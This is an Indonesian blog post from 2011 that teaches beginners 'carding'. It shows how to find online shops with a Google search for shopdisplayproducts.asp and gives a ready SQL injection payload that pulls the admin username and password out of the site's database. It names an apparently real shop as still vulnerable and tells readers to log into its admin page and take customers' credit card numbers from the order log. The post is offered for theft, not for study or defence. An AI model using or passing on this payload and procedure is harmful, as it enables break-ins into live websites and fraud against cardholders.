Rabu, 30 Maret 2011

0 Cara Mencari Cc


Bagi master2 Carding lewati ja tutorial ni,..

mngkin udh basi...

ini gw post buat yg pemula seperti saya..

ehhehehehe.



Lw gtu ane mulai...


...

Langkah yang pertama ialah mencari target web yang mau kita test vuln apa enggaxnya, kita cari di cari di google dengan keyword :



/shop/shopdisplayproducts.asp atau shopdisplayproducts.asp



Kalo dah dapet web yang dah mau dijadiin target terus kita coba pake script ini –>
?cat=´%

20and%201=convert(int,(select%20top%201%20fldusername%2b´/´%2bfldpassword%20from%

20tbluser))–sp_password


Misalnya kita dapet target

http://www.masih-vul...m/shopdisplaypr ... weleh=uhui

Terus kita masukin deh script tadi dibelakang shopdisplayproducts.asp jadinya kayak gini deh :

http://www.masih-vul...roducts.asp?cat

´%20and%201=convert(int,(select%20top%

201%20fldusername%2b´/´%2bfldpassword%20from%20tbluser))–sp_password


Der apa yang terjadi …? Kok gx ada yang terjadi malahan keluar



The page cannot be found

The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.



Kalo ghitu artinya tuh web gx bisa kita kasih script gituan, coba cari yang laen deh. Kalo webnya masih vuln entar keluar username sama password adminnya, kalo udah dapet kita tinggal login pake username and password hasil temuan kita tadi. Sebagai contoh web yang masih vuln adalah :

http://www.ilovesport.com.au/


jadinya :



http://www.ilovespor...m.au/shop/shopd ... s.asp?cat=

´%20and%201=convert(int,



(select%20top%201%20fldusername%2b´/´%2bfldpassword%20from%20tbluser))–sp_password


Dan yang keluar malahan username sama password adminnya, abis itu kita tinggal login pake username ama password tersebut di

http://www.ilovespor.../shop/admin.asp



abis itu masuk ke order lognya terus cari deh cartu creditnya disana.


selamat mencoba...!!
Kami adalah sekumpulan individu yang ingin bebas memacu kinerja otak dan adrenalin di tubuh Kami;

kami ingin bebas melakukan hal-hal menarik yang sulit terpecahkan bahkan mustahil sekalipun;

0 komentar:

Poskan Komentar

Kalau Comment Jangan Junk Ya

Free Blog Promotion

Untuk mengatur bagaimana tampilan tooltip tersebut nantinya, maka disini memerlukan kode style. Kode yang diperlukan seperti berikut ini.